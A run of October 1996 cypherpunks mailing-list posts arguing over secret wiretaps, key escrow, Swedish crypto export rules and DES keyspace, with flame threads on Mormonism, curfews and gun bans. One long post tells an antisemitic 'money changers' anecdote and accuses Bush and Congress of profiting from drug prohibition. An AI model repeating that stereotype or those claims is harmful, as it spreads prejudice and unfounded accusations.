collect all your writing on the subject and the objections
of your enemies. do you believe in it or not? put your web pages
where your mouth is!!)

>It didn't have to be this way.  The SC might simply have said that wiretap 
>warrants must follow the same rules all other warrants followed, meaning 
>that the target is informed of the tap when it is placed.  Sure, the police 
>would howl, complaining that they'll never hear anything "useful" if the 
>target is informed, but then again, the Constitution cannot guarantee that 
>any particular search would achieve its intended results.

but then again, if "we the people" didn't challenge a usurpation of
our rights when it happened, something's wrong here. hence my
opinion that wiretapping should be challenged in court.

>Are police entitled to use thumbscrews if simply asking a question won't get 
>the "right" answer"?  I don't think so.  

very poor analogy. a rhetorical loser imho characterisitic of 
painting the issue in terms of extremism.  wiretapping doesn't involve 
any physical pain to the surveilled. also it is barely analogous
to "search and seizure" in that there is nothing physical being
seized. (just playing the devil's advocate here)

>One thing that was very important to those who wrote the US Constitution was 
>the sanctity of contracts.

well, if the person entered in a contract with their phone company
to provide protected communications, maybe you'd have a case there.
in fact such a thing is not such a bad idea. perhaps some would be
willing to pay a premium for phone companies that reject wiretaps
and the whole thing could be solved ala capitalism. perhaps as a
"thousand phone companies bloom" over the next few years this 
will become a reality, assassin-boy.

>As I understand it, there is a principle in law that all affected parties to 
>a dispute must be included in a proceeding. (To ensure that each can protect 
>his own rights.)  Obviously, targets of wiretaps have not been informed, and 
>thus can't possibly have been included. 

on the other hand, there are clear laws that say you can't withhold
evidence. these and the "right not to incriminate" are intertwined.

>While I'm sure that I will be corrected if this is wrong, somehow I doubt 
>whether there has EVER been a "before-the-fact", full challenge of a wiretap 
>order _including_ representation for the target of the wiretap.  Further, I 
>also doubt whether there is frequently ANY SORT of challenge to a wiretap  
>by a telephone company, even when the target was not informed.  Quite 
>simply, the telephone company does not consider itself to be in the business 
>of protecting the rights of its customers!  And without real challenges, 
>there can be no presumed validity to such warrants.

no, you have it backwards; without real challenges, there 
is no validity to anyone trying to defeat the status quo.

[bernstein, etc]
>Since it has always been legal to use encryption (in the US), they're really 
>not "challenging the cryptographic status quo."

no, ITAR has been around a long time and they are challenging it. you're
mixing up the issue.

>I don't know about you, but somehow I'm past the idea that it's possible to 
>reliably get unbiased justice in court.  Know what I mean?

ah yes, we revert to the basic cypherpunk nihilist position oft repeated
by lucky green, tcmay etc-- "essentially, we're screwed"

[searches]
>Well, they don't technically need the "cooperation," but they are still 
>required to inform the target.  For example, if they get a search warrant 
>for a house that happens to be empty when they show up, they are obligated 
>to leave notice of the search and lists of what was taken.  Apparently they 
>need to do this EVEN IF they would have been able to get into the house 
>surreptitiously without leaving any trace.  

interesting and very significant point, one that I was not aware of.
more good legal arguments for challenging "secret wiretaps".

more and more I think cpunks could win on this issue by asserting
that the government doesn't have a right to "*secret* wiretaps" of
the kind they are pushing and ramming down via CALEA. if we got
a court to agree that secret wiretaps are illegitimate, that
leaves the government only with "announced" ones, something
that cpunks find permits an acceptable level of monkeywrenching.
i.e. start making the distinction between the way wiretaps are
secret and the suspect is not ever informed of the wiretapping,
contrary to physical search-and-seizure procedures.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 5 Oct 1996 12:33:39 +0800
To: cypherpunks@toad.com
Subject: Re: Clipper III on the table
In-Reply-To: <9610042054.AA22661@hydra.cde.x.org>
Message-ID: <guPaVD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Stephen Humble <deeb@x.org> writes:
> > Likewise the gubmint or a corporation bigger than mine is free to
> > say that there should be no data on its computers or its contractors
> > computers that they can't read.
>
> Whoa!  Unless the service contracted for includes the use of the
> contractors' computers, what business does the employer have poking
> around in someone else's computer?  I can easily see Big Brother
> demanding exactly that, but He won't hire me under those conditions.
>
> Or was that just a slip of the mind, assuming large organizations
> should have greater powers than smaller ones?  I do that too much
> myself.

Well, no. I (and any other employer) should be able to specify that
if you do work _for me, you do it on either my equipment, or on
equipment configured and secured to my standards.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sat, 5 Oct 1996 14:50:44 +0800
To: cypherpunks@toad.com
Subject: Re: Very brief comments on LDS/Mormons
In-Reply-To: <v03007808ae7af10d0afb@[207.167.93.63]>
Message-ID: <v03007804ae7b770ef90d@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



(Attila's long post deleted to save space, and to keep me from commenting
on sections.)

This was one of the most thought-provoking pieces I've read. I can't say
I'm in favor of curfews, but Attila presented some thought-provoking
points,  consistent with my own "best is often the enemy of the good"
points.

I doubt I'm ready to move to St. George, Utah, attractive as it sounds in
some ways. (Nevada is probably just as attractive, and California even more
so, for me. I drove from Las Vegas to Reno, but gave up in the vaste
nothingness, and cut over through Tioga Pass and Yosemite to my area...boy,
was I happy to be back in California. For all of its oddnesses and
problems, it is truly an amazing place. Though I dislike some things about
it, I always come back.)

As to Moroni's objection to my characterization of LDS/Mormonism as a
"cult," I refer to _all_ religions this way. Catholocism, Judaism,
Protestantism, Mormonism, Buddhism, they are all roughly the same to me. If
you are offended, this is your problem. I take no position on which of
these belief systems are valid and which are not.

--Tim

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Sat, 5 Oct 1996 07:09:46 +0800
To: cypherpunks@toad.com
Subject: Re: DESCrack keyspace partitioning
Message-ID: <844458782.11259.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> Seems to me that a _subset_ of all possible keys is much more likely
> to appear than a random selection from an equidistributed population 0..2^56.

No, this is not true of a good PRNG

> (P)RNG's just aren't that likely to produce a key of 010101010.....
> nor 001100110011... etc etc and I have been thinking about how one might formalize 
> and exploit this randomness property to increase the probability of finding the key sooner.

Good PRNGs are as likely to produce these key values as anything 
else. the reason random looking patterns occur more often is because 
there are more of them.


> Is not the lack of predictability a predictable, and therefore exploitable, attribute?

The fact is a PRNG may *LOOK* predictable, ie. 111000111000 but the 
next bit will have an equal probability of being a 0 as a 1.

> Any thoughts here?

None whatsoever.
 

  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Sat, 5 Oct 1996 07:33:06 +0800
To: cypherpunks@toad.com
Subject: Re: The Right to Keep and Bear Crypto
Message-ID: <844458781.11258.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


 
> Crypto relevancy?  Well, the so-called "gun nuts" have already tolerated far 
> more regulation and restriction of guns than we should ever accept.  But if 
> we use their tactics, can we expect any better results?

I don`t know so much about the US law, but here in the UK the problem 
with the gun lobby and the campaigns against internet controls are 
purely volume and not technique, there has not been enough done.

In the UK now we are looking at a total ban on handguns, within 5 or 
10 years all guns will probably be banned, the shit has seriously hit 
the fan over here, all because of the Dunblane murders (15 or so 
schoolchildren killed by a nutter with a legally owned (licenced) 
handgun)
The fact is the police fucked up, he was known to be a loner and a 
child molester and they granted him a firearms licence.

In addition the media have played a big part too, I don`t know if the 
US mainstream paper media is as bad as the UK`s but we have about 5 
papers which I wouldn`t wipe my ass on, such as the sun, the mail, 
the mirror etc. all of which have, at sometime during the ordeal used 
the exact words below:

Gun owners are big children who like to play with dangerous toys
All gun owners are dangerous psychopaths

They have also described gun lobby activists as "gun toting" and 
"obsessed with firearms"

More has got to be done before the USA goes the same way, I sure as 
hell won`t be living in the UK much longer if the law continues to 
change like it has. Fuck them all, that is really all I can say, 
don`t let it happen to you kids...





 

  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 5 Oct 1996 15:44:20 +0800
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Utah as a Religious Police State [RANT]
In-Reply-To: <4Ly0uD38w165w@bwalk.dm.com>
Message-ID: <3255BFA3.7AE3@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Dr.Dimitri Vulis KOTM wrote:
> Dale Thorn <dthorn@gte.net> writes:
> > Deana Holmes wrote:
> > > On  2 Oct 96 at 8:47, John C. Randolph wrote:
> > > > Moroni says:

> > P.S.  I cringe every time I hear one of the CNN bozos pronounce
> > Israel as in real estate, or get real.  I think they all have to
> > attend the Rick Dees school of broadcasting, so it's a standard,
> > like GAK or something is going to be the standard.

> What is the crypto-relevance of the above-quoted passage?

Caught ya' that time, "doctor".  Didn't ya' see the term "GAK" above?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 5 Oct 1996 14:26:56 +0800
To: John Young <jya@pipeline.com>
Subject: Re: NYT Nix GAK
In-Reply-To: <199610041312.NAA20299@pipe2.ny3.usa.pipeline.com>
Message-ID: <3255C1AA.31EC@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


John Young wrote:
>    The New York Times, October 4, 1996, p. A32.
>    A Flawed Encryption Policy [Editorial]

[some text deleted]

>    However, the Administration downplays the fact that
>    encryption is also a good way for honest citizens to
>    prevent crime. At a time when banks and other private
>    companies send vast amounts of confidential information
>    over the electronic highway, it would seem sensible to make
>    high-quality encryption widely available so that the
>    private sector can protect itself from criminal or
>    malicious eavesdropping. For that reason, the Government
>    ought to promote wide-scale dissemination of encryption,
>    both here and abroad.

Now, for those folks who oppose the personal ownership of firearms, or 
at least "really dangerous" firearms, I'd like to know exactly what's 
the difference (in principle) between the above "...high-quality 
encryption widely available so that the private sector can protect 
itself from criminal or...", and making firearms widely available?

Surely the NYT is not going to join the NRA equivalent of pro-personal- 
crypto crackpots, anarchists, and all that?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@Cor.sos.sll.se>
Date: Sat, 5 Oct 1996 05:27:02 +0800
To: cypherpunks@toad.com
Subject: Secret Swedish GAK and ITAR
Message-ID: <Pine.HPP.3.91.961004181024.13299A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


Gunnar Klein, a Swedish MD, is chairing a EU committee dealing
with standardization of security measures in medical information
systems. Recently, in a full-page anti-GAK debating article in a
national Swedish evening newspaper (Aftonbladet 9/25/96), he
chose to reveal some secret information he's gotten hold of:

Sweden's representatives in the OECD GAK proceedings have declared
that Sweden is willing to sign bilateral or multilateral GAK
treaties, if other countries so demand. This declaration, along
with the OECD records per se, has been classified.

He also discloses that Sweden in late 1994, effectively in total
secrecy, issued a completely new law against export of 'stretegic
products', principally including all cryptography, without
permission from the 'Inspection for Strategic Products'. In theory
this law would cover export of a crypto program on a notebook.

Gunnar Klein suspects US strong-arming behind all this.

Obviously, Denmark has taken a different, anti-GAK, position in the
OECD proceedings. Denmark is less susceptible to US blackmail than
Sweden - they don't build fighter-planes with lots of US high tech
parts inside (like the JAS/Gripen).


Asgaard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Moroni <moroni@scranton.com>
Date: Sat, 5 Oct 1996 13:14:32 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: I resent the word cult.
In-Reply-To: <v03007808ae7af10d0afb@[207.167.93.63]>
Message-ID: <Pine.LNX.3.95.961004185932.2723D-100000@user1.scranton.com>
MIME-Version: 1.0
Content-Type: text/plain


        The resent the word cult being used to describe my religions.
While I don't think it is good to make fun of even one's own religion I
really think that it is in bad taste to knock another's religion. Time and
bandwidth have been wasted on more than one occasion with your
interjecting your personal views about other peoples religions only to
find that other people do not view their faiths academically. I think that
all religion should be kept off this list . I did not become a member to
prostelytise people on this list and did not expect other people to start
agitating mormons or moslems or Jews or other faiths. I mind my p's&q's
but I don't have and certainly will sit idly by when someone makes my
people look bad. Any trouble that you have made starting this thread was
done by you so don't complain.
         Inciderntally, I emailed tilly a great source for soy meats for
all those that have emailed me to say that they are returning to the
church.


On Fri, 4 Oct 1996, Timothy C. May wrote:

> 
> I suppose I'm chagrinned that a thread I named, "Utah as a Religious Police
> State," has been followed by *so many* religious flames, pro- and con-
> Mormonism. (I use Mormonism as shorthand for LDS...sosumi.)
> 
> My point was not to attack Mormonism, esp. the religious beliefs.
> Personally, I think cults are useful in keeping people off the streets
> (better than police-enforced curfews). I was mainly challenging Attila's
> glowing opinion of how his community "enforces curfews big time." Telling
> people when they can be on public streets and when they cannot is no
> different than telling them what they can read and what they cannot.
> 
> ("Telling them" in the sense of backing it up with the power of the state.
> For example, the LDS church is perfectly free to "tell" its members not to
> read the books of, say, Juanita Brooks. However, this may not be enforced
> by the government or its police and court arms, so long as Utah is part of
> these United States. Period.)
> 
> Personally, I find Mormonism to be a good "survival meme."
> Self-preparedness, food storage, self-reliance, etc., are all counter to
> the "I'll just let government take care of me" meme which is so common in
> the rest of society. I don't cotton to supernatural explanations of the
> world, though, so I've never been in involved in any religion (past age 11).
> 
> This is the last thing I'll say on Mormonism. Whether some subset of
> settlers committed some set of crimes in Mountain Meadows is a footnote in
> history--who really cares about such anomalies? I care more about the
> present.
> 
> I still urge Attila to rethink his enthusiastic support of state-enforced
> curfews, or state-imposed bans on alcohol (not that I recall him supporting
> this particular law), etc.
> 
> --Tim
> 
> "The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
> that the National Security Agency would try to twist their technology."
> [NYT, 1996-10-02]
> We got computers, we're tapping phone lines, I know that that ain't allowed.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."
> 
> 
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 5 Oct 1996 15:04:20 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: gack vs. key escrow vs. key recovery
In-Reply-To: <199610040033.RAA18660@netcom19.netcom.com>
Message-ID: <3255CC23.2029@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Vladimir Z. Nuri wrote:
> cpunks, a note about recent developments in "key recovery" initiative.
> I think cpunks as a group should reconsider very seriously their
> own positions on cryptography and come up with something more
> sophisticated than "any government bill or plan associated with
> crypto is evil" which is the functional equivalent of the ideology
> behind many recent posts.

[some text deleted]

> personally I am leaning toward (2), because I feel that we already
> live in such a society, and that it is not orwellian. companies are
> going to lean toward (2). I do agree

[more text deleted; (2) is a reference to a legal warrant or subpoena 
for "information"]

I think you will find ultimately that personal communication is just 
that, i.e., personal.  OTOH, the means by which that communication are 
effected (phones, computers, with or without encryption) are the things 
that the government wants to control, presumably to get at information 
that you and I couldn't conveniently communicate in person, in private.

The very idea that people don't have the right to hide their private 
conversations from *anyone*, including police, is ludicrous, and can't 
possibly be enforced, but the devices (if any) that are used, that's 
another matter.

I hope someone understands what I'm getting at, and can add to this.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sat, 5 Oct 1996 13:35:08 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Very brief comments on LDS/Mormons
In-Reply-To: <v03007808ae7af10d0afb@[207.167.93.63]>
Message-ID: <199610050036.SAA23740@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


In <v03007808ae7af10d0afb@[207.167.93.63]>, on 10/04/96 
   at 09:03 AM, "Timothy C. May" <tcmay@got.net> said:

-.Personally, I find Mormonism to be a good "survival meme."
-.Self-preparedness, food storage, self-reliance, etc., are all counter to the
-."I'll just let government take care of me" meme which is so common in the
-.rest of society. I don't cotton to supernatural explanations of the world,
-.though, so I've never been in involved in any religion (past age 11).
-.
        dont worry, there has never been a book burning in Utah --even 
    when it was fashionable in the East for almost two centuries.  
    anyone who advocates book burning in Utah is not LDS.

        the LDS church does not disseminate a list of proscribed
    literature, and does not actually 'preach' anything other than
    what we consider 'acceptable' morality.  everyone has their own
    "free agency" and if they are practicing, certainly understand
    what those standards mean.  personally, I see nothing wrong with
    nudity, but R pictures have starting to approach what was X and
    is now NC-17 (under 16) --and NC-17 now includes almost what was
    XXX.

        the Church does not dictate, nor actually moralize --each 
    individual is left with their own responsibility and the impending
    review of their mortal life.

-.I suppose I'm chagrinned that a thread I named, "Utah as a Religious Police
-.State," has been followed by *so many* religious flames, pro- and con-
-.Mormonism. (I use Mormonism as shorthand for LDS...sosumi.)
-.
        tim, at the end (instead of here where it probably belongs) is
    some extended food for thought on how a corrupt Fed regulates
    thought and action --starting in the 1800s, proving that the party
    in power, even in a supposed democratic republic, still dictates
    what you will read, think, and practice.  the more I study (what is
    now --going on since I started school in 1945), the more cynical
    I become of human nature and the abuse men have permitted
    from whatever government extant.  

        if you think about it, the actions against the LDS in the 1800s
    is very little different than the power hungry, corrupt Feds of 
    today who are attacking the Bill of Rights as obsolete in the
    face of todays terrorism (is it so different from any before except
    it is faster and deadlier?).

        In our (LDS) terms I refer to the Feds as the Gadianton robbers
    who were the insidious 'mafia' which usurped government power 
    under the guise of 'law and order' in a period of the book of 
    Mormon...
 
        --or even the Pharisees (the temple money changers) of Jesus' 
    time. The same concept of the Pharasees is still practiced by the 
    Jewish faith today.   (another comment on today's pharisee's --a
    truly amazing eye opener, towards the end). 

-.My point was not to attack Mormonism, esp. the religious beliefs.
-.
        No, I sure it was not --but you may have been the only one! <g> 

-.Personally,
-.I think cults are useful in keeping people off the streets (better than
-.police-enforced curfews). I was mainly challenging Attila's glowing opinion
-.of how his community "enforces curfews big time." 
-.
        Frankly, we do not wish curfews, and there never were curfews 
    before the immense immigration into the area, mostly from So. CA,
    over the last 15 years which changed St. George from the small 
    town of less than the 5,000 in 1970 when I left St. George, to the
    almost 30,000 when I came home within the last year.  

        I chose not to actually return to St. George, where a two lane
    main drag had been changed from a two lane, tree line "road" 
    to a glitzed 4 lanes plus center lane boulevard, instead moving
    North to the rural high desert  (we have no legislated curfew).

        St. George today is not Mormon dominated politics, but the
    bulk of the immigrants expected to find, and maintain, that small
    town innocence --which they have more or less done. 

        However, these people, Mormons (some good, some inactive) and
    non-Mormans alike, unfortunately brought with them the alien 
    cultural they were trying to escape: bored children without super-
    vision, a junk food way of life, dual-income families, and children
    feeling aliented and lost in a world they do not understand --not
    St. George, but the world itself and its television age.

        It was in this atmosphere the "non-homogenous" but somewhat
    like thinking apparently demanded the permanent curfew --there is 
    absolutely nothing to do by that time, and milling around what
    passes for a mall here (grocery store) was/is not considered
    acceptable.  Secondly, St. George seems to attract an influx of
    3-5,000 high school students at Spring break (it is very warm
    by that time, despite the 3,000 ft  alt)  

        --but why?  there is nothing here.  they wanted beer, but they
    could not legally buy beer, or rent a hotel room under 18 --does
    not make sense.  so they had a milling, loose crowd of "foreign"
    teenagers.  --just like Sonny Bono, as mayor of Palm Springs,
    found himself with every year: illegal drinking,  convertibles
    with even pre-pubescent girls standing naked on the trunk decks,
    etc.  --don't say "where? where? where!?!

        well, that prompted the curfew, but they found it also 
    maintained the semblance of peacful family oriented community
    among the lost and alienated families --so it is apparently here
    to stay.  other than the fact we are telling tparents who do not 
    wish to manage their children they must keep them home or take them
    somewhere, what does the law do? 

-.Telling people when they
-.can be on public streets and when they cannot is no different than telling
-.them what they can read and what they cannot.
-.
        that was my initial reaction -you wouldn't tell me that!  but 
    consider the right of society to legislate and  regulate in the 
    common good, despite both my and your abhorence of law in an of
    itself.  

        it is an effective means of forcing parents who do not seem to 
    care, or parents who wish to shift their responsibilities to social
    workers who are not available, they have a responsibility.  what
    happens to the violators --few are arrested, they are asked to go
    home. there is no great wild-west roundup of teenaged cattle! any
    who resist or commit minor vandalism are taken to the center --but,
 
        unlike every other city I have seen, they do not mix the 
    'miscreants' with the juvenile delinquents, repeat offenders, and 
    the teenagers who are obviously on their way to the dead end.

        what is the penalty?  call their parents for a ride home.  they
    are not fingerprinted and mugged, etc.  very few are required to
    even see a social worker.  consistent repeat offenders eventually
    enter the system --as they should.

-.I still urge Attila to rethink his enthusiastic support of state-enforced
-.curfews, or state-imposed bans on alcohol (not that I recall him supporting
-.this particular law), etc.

        actually, the curfew laws are local laws, and I reluctantly
    decided to support curfew laws for minors after looking at the
    means and results --it does provide an early point of intercepting
    behavioral patterns with the *parent* being the judge and warder,
    and hopefully give those parents a wakeup call they need to guide
    their children as they are fast approaching adulthood where they
    are fully accountable.

        alcohol is available at any large grocery store; it has not been
    banned to any extent since prohibition, but not necessarily avail-
    able in rural areas.  

        in Salt Lake City and the more heavily populated north, there 
    are bars.  prior to about 15 years ago, you could brown bag your
    own hard liquor to a restaurant; today restaurants have full 
    permits.  In St. George there actually is a bar! --you do need to 
    *know* where to find it (I was told a few weeks ago the area, but 
    I could care less).

        I do not think you can prohibit anything from adults --drugs,
    prescription or recreational, included --no matter how destructive.
    all 18 of the US code provides is a 'illegalization' of a criminal
    class with enormous financial power --and, worse, a corrupt and
    lawless enforcement agency with an equally corrupt and evil class
    of attorneys to protect both the distributors and the corrupt 
    opponents  --modern, legal, efficient predatation on a class. 

        legalize drugs, etc. and the ATF, the DEA, and a host of allied
    agencies which cause billions of dollars per year and provide
    nothing in return will be totally unnecessary (except to snoop for
    paranoid Bubba...)  --even Bubba could enjoy his five lines a day
    and not be in defiance of our legal system!

        and think of the destruction of the narco-terrorist gangs;
    --there would be no money, power, or illicit prestige; no enormous
    slush funds to put Uzis in the hands of an 8 year old, or bribe 
    cops and politicians.  our urban decay and combat zones would be
    boring --some might find it necessary to even learn enough to be
    able to watch a robomachine do the work!  this is beginning to 
    sound like utopia.

        so why do we not legalize dope?  simple: George Bush's income
    stream would dry up along with the literally thousands of other
    supposedly law-abiding politicians who are on the gravy train!

        take away the illicit profits for Congress and we might even 
    an honest reformer or two in Washington.




        certainly we are justified in ranting against any abridgement of 
    our right to freely (and privately) communicate, freedom of 
    *peaceful* assembly, a truly free press --certainly not the New 
    World Order blinded press printing the official line dictated by
    political/economic Boss Tweeds of what is effectively an oligarchy 
    --they do not possess common principles sufficient to even be
    called 'national socialists' (fascists). 

        or, there is a government like Washington where they are trying
    to, and may anyway, implement President Hillary's "It takes a 
    Global Village" so the state can dictate everything and raise a new
    generation of robots in the mold of their revisionist history which
    we are now suffering by attrition....   

        If Bubba and the President are reelected with a Democratic 
    Congress, we will not recognize our once almost free country in
    the space of a few short years.  Bubba is a space cadet political
    wonder  -the front man, wandering in his drug induced sub-space;
    Hillary is a the intelligent, crafty, 60s idealist socialist 
    liberal --dedicated and determined to impose her order at whatever
    expense of liberty necessary.

        or, Hillary's social order which plays directly into the hands 
    of the NWO, the very rich, old family elitists.  first the cradle to
    the grave thought control welfare state; and entire amorphous
    classes of thoughtless drones  --then comes the changes for the
    survival of the human race: the total disenfranchisement of major
    components of the underclass, and the establishment of an effec-
    tively feudal structure with a serf labor pool.

        or, the disturbing trend of an almost exponentially increasing
    prisoner class who are being shifted to prisons run by defense
    contractors who are permitted to "employ" them at minimum wage;
    paying WH, FUTA, FICA, and all that good stuff; and taking all but
    chump change for their room and board.  Today that decuction
    does not cover their actual confinement, but we can obviously rest
    assured the defense contractors will take the burden off the tax-
    payers (at what cost human suffering) *and* make a profit! 
    
        in other words, encouraging the breakdown of the classic 
    American family actually benefits the NWO by providing a lawless
    element which can be imprisoned for profit, and reduce the birth
    rate simultaneously --what a benefit!

-.I still urge Attila to rethink his enthusiastic support of state-enforced
-.curfews, or state-imposed bans on alcohol (not that I recall him supporting
-.this particular law), etc.


-.This is the last thing I'll say on Mormonism. Whether some subset of settlers
-.committed some set of crimes in Mountain Meadows is a footnote in
-.history--who really cares about such anomalies? I care more about the
-.present.

     
some historical thought on why lack of religious freedom:

        actually, when you look back in history, what was it that just just
    lit the fires in Washington which provoked the Feds to even
    legislate laws which contravened the whole concept of what the
    Constitution stands for --laws which literally dissolve the Church
    a legal entity, confiscated Church property in excess of $50,000
    [not that much by 1875], revoked woman's suffrage in Utah
    (Wyoming (which is heavily, though not predominantly Mormon,
    at that time enacted woman's suffrage first in the nation a few
    months before Utah), disenfranchised all officials of the Church,
    and any members practicing polygamy?

        other than the fact a number of territorial governors after
    the first one sent from Washington with Johnson's Army (trapped
    at Fort Bridger) who was gracious and therefore replaced by some
    pretty vicious and greedy slimeballs who transmitted messages to a
    very distant Washington of "rebellion" by armed and dangerous 
    outlaws, what was it?

        utah was a land no-one, including many of Brigham Young's
    followers wanted, but they had transformed a very inhospitable land
    into a virtual land of plenty. 

        even though Brigham Young was replaced as governor in 1858 by 
    the territorial governors from Washington, the Church was both
    monolithic and defensive --understandably.

The Pharisees are alive and well today:

            in my previous ward in California, the LDS chapel was "leased" 
    gratis, other than janitorial fees, (including totally rearranging our 
    own worship schedules to accommodate) to one Jewish temple's 
    overflow for the Rosh Hosana (sp?) and Yom Kipper holidays.

        their advance guard 'required' six hours to set up and I was
    still in our ward offices (member of the bishopric)  at the start...
    they litterally set up two rows of _money changing_ tables at the
    entrance (tables you must pass between); they had sold tickets of
    admission; and the seats in the chapel were sold like opera 
    tickets: priced according to location.  

        OK, that's their deal, I thought --so what?  but curiosity got
    the better of me, and I asked one of their people who appeared
    to be approachable about the seating --it was he who informed me
    of the price schedule --the front area seating was $10,000 per
    seat --anything moving into our multicultural hall (gym, etc.) which
    has acoustical 'curtains' between the chapel was still >$500!  I
    did not have the courage to ask what it cost to sit upon the dias!


-.--Tim

-."The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
-.that the National Security Agency would try to twist their technology." [NYT,
-.1996-10-02]
-.We got computers, we're tapping phone lines, I know that that ain't allowed.
-.---------:---------:---------:---------:---------:---------:---------:----
-.Timothy C. May              | Crypto Anarchy: encryption, digital money,
-.tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
-.W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
-.Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
-."National borders aren't even speed bumps on the information superhighway."





--
  "I don't make jokes. 
    I just watch the government and report the facts."
        --Will Rogers





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 5 Oct 1996 13:07:03 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: legality of wiretapping: a "key" distinction
Message-ID: <199610050252.TAA02130@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:10 PM 10/4/96 -0700, Vladimir Z. Nuri wrote:
>>It didn't have to be this way.  The SC might simply have said that wiretap 
>>warrants must follow the same rules all other warrants followed, meaning 
>>that the target is informed of the tap when it is placed.  Sure, the police 
>>would howl, complaining that they'll never hear anything "useful" if the 
>>target is informed, but then again, the Constitution cannot guarantee that 
>>any particular search would achieve its intended results.
>
>but then again, if "we the people" didn't challenge a usurpation of
>our rights when it happened, something's wrong here.

I've read references to polls which repeatedly show that well over 60% of 
the public is opposed to wiretaps, period.

But no, I'm under no illusion that even a legal challenge would be respected.


> hence my
>opinion that wiretapping should be challenged in court.

Well, I agree it should be challenged, but if anything my point is that the 
reason it wasn't challenged was the fact that wiretap targets are never 
given the opportunity.  

(Note for the clueless out there: An after-the-fact challenge doesn't count. 
 Apparently, "non-incriminating" wiretaps are essentially never announced to 
the victim...er...target.  And judges are sufficiently biased, gutless, and 
brainless that they almost never throw out the _incriminating_ results of a 
wiretap warrant.  THis is for the same reason Judge Ito didn't throw out the 
evidence the four crooked detectives got in OJ's house, after jumping the 
fence without a warrant, claiming that they were afraid somebody was in 
danger inside.  As I'm fond of saying, "Fuhrman pretended to tell the truth, 
and Ito pretended to believe him.")


>>Are police entitled to use thumbscrews if simply asking a question won't get 
>>the "right" answer"?  I don't think so.  
>
>very poor analogy. a rhetorical loser imho characterisitic of 
>painting the issue in terms of extremism.  wiretapping doesn't involve 
>any physical pain to the surveilled. also it is barely analogous
>to "search and seizure" in that there is nothing physical being
>seized. (just playing the devil's advocate here)

No, not at all.  The point is that acknowledged illegal tactics (remember, 
wiretaps were illegal before 1968, but they were done!) may be 
unquestionably "useful," but that doesn't mean that they are acceptable.  If 
anything, the fact that cops would use illegal tactics proves that they 
aren't very good judges of what tactics are appropriate.  Furthermore, the 
fact that telephone companies ALLOWED cops to do illegal wiretaps before 
1968 (and even assisted them) proves that you can't depend on them to limit 
these tactics to reasonable limits.


>>One thing that was very important to those who wrote the US Constitution was 
>>the sanctity of contracts.
>
>well, if the person entered in a contract with their phone company
>to provide protected communications, maybe you'd have a case there.
>in fact such a thing is not such a bad idea.

